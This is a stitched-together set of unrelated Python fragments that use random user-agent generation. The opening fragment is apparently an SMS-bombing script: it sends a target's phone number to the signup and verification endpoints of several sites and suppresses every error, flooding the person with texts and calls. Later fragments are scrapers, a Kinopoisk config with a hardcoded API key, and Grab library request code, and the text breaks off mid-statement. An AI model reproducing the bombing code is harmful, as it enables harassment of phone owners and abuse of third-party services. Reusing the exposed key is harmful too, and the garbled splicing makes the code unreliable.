formatted_phone}, headers=headers) except: pass try: post("https://bamper.by/registration/?step=1", data={ "phone": "+" + phone, "submit": "Запросить смс подтверждения", "rules": "on" }, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "(###) ###-##-##") get("https://avtobzvon.ru/request/makeTestCall", params={"to": formatted_phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://oauth.av.ru/check-phone", json={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://api-prime.anytime.global/api/v2/auth/sendVerificationCode", data={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://apteka.ru/_action/auth/getForm/", data={ "form[NAME]": "", "form[PERSONAL_GENDER]": "", "form[PERSONAL_BIRTHDAY]": "", "form[EMAIL]": "", "form[LOGIN]": formatted_phone, "form[PASSWORD]": password, "get-new-password": "******", "user_agreement": "on", "personal_data_agreement": "on", "formType": "simple", "utc_offset": "120" }, headers=headers) except: pass
def __init__(self): super(HttpHandler, self).__init__() self.session = Session() self.headers = {'User-Agent': generate_user_agent()}
def _getContentFromSite(self, link): r = requests.get(link) r.headers = {"User-agent:", generate_user_agent()} content = str(r.content, self.encoding, errors="replace") soup = BeautifulSoup(content, 'html.parser') return soup
for url in urllist: try: # searchinput=browser.find_element_by_css_selector('#kw') # searchinput.send_keys(msgstring) # searchinput.send_keys(Keys.DOWN) # 浏览器设置 # cityname='' # ip_proxy=changeip(cityname) service_args = [] dcap={} #从USER_AGENTS列表中随机选一个浏览器头,伪装浏览器 uainfo=generate_user_agent() print(type(uainfo)) print(uainfo) # dcap["phantomjs.page.settings.userAgent"] = ( # uainfo # ) # dcap["phantomjs.page.settings.loadImages"] = False # # IP代理 # proxy = webdriver.Proxy() # proxy.proxy_type = ProxyType.MANUAL # proxy.http_proxy = ip_proxy # proxy.add_to_capabilities(dcap) # browser = webdriver.PhantomJS(desired_capabilities=dcap,service_args=service_args)
def default_header(self): return { 'Referer': 'https://www.chinawealth.com.cn/zzlc/jsp/lccp.jsp', 'User-Agent': generate_user_agent(os=('mac', )), 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8' }
'ClientId': '55decdcf6d4cd1bcaa1b3856', 'Accept': 'application/json', 'device': 'android', 'Android-Api-Version': '22', 'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536', 'User-Agent': 'Android client (4.4 / api22),ru.kinopoisk/4.2.1 (52)' } config['kinopoisk']['main'][ 'search'] = 'https://kinopoiskapiunofficial.tech/api/v2.1/films/search-by-keyword?keyword=%s&page=%s' config['kinopoisk']['main']['headers'] = lambda: { 'Referer': 'https://www.kinopoisk.ru', 'Accept': 'text/html, application/xhtml+xml, image/jxr, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.8,ru;q=0.7,uk;q=0.5,de-DE;q=0.3,de;q=0.2', 'User-agent': generate_user_agent(), 'X-Compress': 'null', 'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536', 'Upgrade-Insecure-Requests': '1' } config['kinopoisk']['main'][ 'yasearch'] = 'https://suggest-kinopoisk.yandex.net/suggest-kinopoisk?srv=kinopoisk&part=%s&nocookiesupport=yes' config['kinopoisk']['images'] = '%s' config['kinopoisk']['imagesactor'] = 'https://st.kp.yandex.net/images/%s' config['kinopoisk'][ 'actor'] = config.kinopoisk.imagesactor % 'actor_iphone/iphone360_%s.jpg' config['kinopoisk'][ 'thumb'] = 'https://kinopoiskapiunofficial.tech/images/posters/kp_small/%s.jpg' config['kinopoisk'][
def get_useragent(): headers = dict() user_agent = generate_user_agent(os=('mac', 'linux')) headers['User-Agent'] = user_agent return (headers)
def process_config(self, grab): req = Request(data=None) try: request_url = normalize_url(grab.config['url']) except Exception as ex: raise error.GrabInvalidUrl( u'%s: %s' % (six.text_type(ex), grab.config['url'])) req.url = request_url method = grab.detect_request_method() req.method = make_str(method) req.body_maxsize = grab.config['body_maxsize'] if grab.config['nobody']: req.body_maxsize = 0 req.timeout = grab.config['timeout'] req.connect_timeout = grab.config['connect_timeout'] extra_headers = {} # Body processing if grab.config['body_inmemory']: pass else: if not grab.config['body_storage_dir']: raise GrabMisuseError( 'Option body_storage_dir is not defined') file_, path_ = self.setup_body_file( grab.config['body_storage_dir'], grab.config['body_storage_filename'], create_dir=grab.config['body_storage_create_dir']) req._response_file = file_ req._response_path = path_ if grab.config['multipart_post'] is not None: post_data = grab.config['multipart_post'] if isinstance(post_data, six.binary_type): pass elif isinstance(post_data, six.text_type): raise GrabMisuseError('Option multipart_post data' ' does not accept unicode.') else: post_items = normalize_http_values( grab.config['multipart_post'], charset=grab.config['charset'], ignore_classes=(UploadFile, UploadContent), ) #if six.PY3: post_items = decode_pairs(post_items, grab.config['charset']) post_items = process_upload_items(post_items) post_data, content_type = encode_multipart_formdata(post_items) extra_headers['Content-Type'] = content_type extra_headers['Content-Length'] = len(post_data) req.data = post_data elif grab.config['post'] is not None: post_data = normalize_post_data(grab.config['post'], grab.config['charset']) # py3 hack # if six.PY3: # post_data = smart_unicode(post_data, # grab.config['charset']) extra_headers['Content-Length'] = len(post_data) req.data = post_data if method in ('POST', 'PUT'): if (grab.config['post'] is None and grab.config['multipart_post'] is None): raise GrabMisuseError('Neither `post` or `multipart_post`' ' options was specified for the %s' ' request' % method) # Proxy if grab.config['proxy']: req.proxy = grab.config['proxy'] if grab.config['proxy_userpwd']: req.proxy_userpwd = grab.config['proxy_userpwd'] if grab.config['proxy_type']: req.proxy_type = grab.config['proxy_type'] else: req.proxy_type = 'http' # User-Agent if grab.config['user_agent'] is None: if grab.config['user_agent_file'] is not None: with open(grab.config['user_agent_file']) as inf: lines = inf.read().splitlines() grab.config['user_agent'] = random.choice(lines) else: grab.config['user_agent'] = generate_user_agent() extra_headers['User-Agent'] = grab.config['user_agent'] # Headers headers = extra_headers headers.update(grab.config['common_headers']) if grab.config['headers']: headers.update(grab.config['headers']) req.headers = headers # Cookies self.process_cookie_options(grab, req) self._request = req
def run(): ua = generate_user_agent()